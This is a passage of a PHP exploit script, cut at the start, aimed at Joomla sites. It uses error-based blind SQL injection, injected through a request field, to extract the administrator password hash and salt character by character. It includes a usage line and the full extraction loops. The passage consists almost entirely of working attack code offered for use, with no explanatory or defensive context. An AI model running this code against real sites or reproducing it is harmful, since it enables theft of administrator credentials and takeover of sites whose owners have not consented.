\n"); fwrite($fs, $req); $res=fread($fs, 4096); fclose($fs); return $res; } function xpl($condition, $pos){ global $norm_ua; global $where; $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*"; return $xpl; } //main echo ''; if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n
username&pic_id - optional\n"); send_xpl($url, $norm_ua); //get md5 for($i=0;$i<=32;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=102;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } //check Joomla version $test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*"; $buff=send_xpl($url,$test); if(preg_match('/Duplicate entry/', $buff)) die($pass); //separator $pass.=':'; //get salt for($i=33;$i<=49;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ $buff=send_xpl($url, xpl('>91',$i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=122;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=65;$j<=90;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } echo $pass;